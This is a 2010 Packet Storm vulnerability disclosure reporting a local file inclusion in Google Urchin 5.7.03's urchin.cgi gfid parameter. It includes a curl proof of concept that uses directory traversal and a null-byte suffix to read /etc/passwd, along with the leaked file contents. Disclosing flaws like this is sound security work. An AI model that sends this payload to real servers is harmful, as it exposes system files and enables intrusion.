Google Urchin 5.7.03 Local File Inclusion

2010-12-14T00:00:00
ID PACKETSTORM:96692
Type packetstorm
Reporter Kristian Hermansen
Modified 2010-12-14T00:00:00

Description

                                        
                                            `While fuzzing an Urchin web application, I discovered what appears to  
be an LFI vulnerability. Neither Secunia nor Google / Urchin appear  
to have reported this as a known issue. The problem lies in the gfid  
parameter passed to urchin.cgi. This was tested on a somewhat  
modified version of Urchin 5.7.03, but it appears that the gfid param  
can be influenced given the results. I don't have the ability to test  
further, but this appears valid and unpublished. Can anyone confirm  
they see similar behavior in the same version or other versions?  
  
PoC:  
"""  
$ curl -s -b '...cookie_data...'  
'https://host/path/urchin.cgi?profile=...&rid=13&cmd=svg&gfid=/../../../../../../../../../../../etc/passwd%00.html&ie5=.svg'  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
...  
"""  
--   
Kristian Erik Hermansen  
http://www.linkedin.com/in/kristianhermansen  
  
`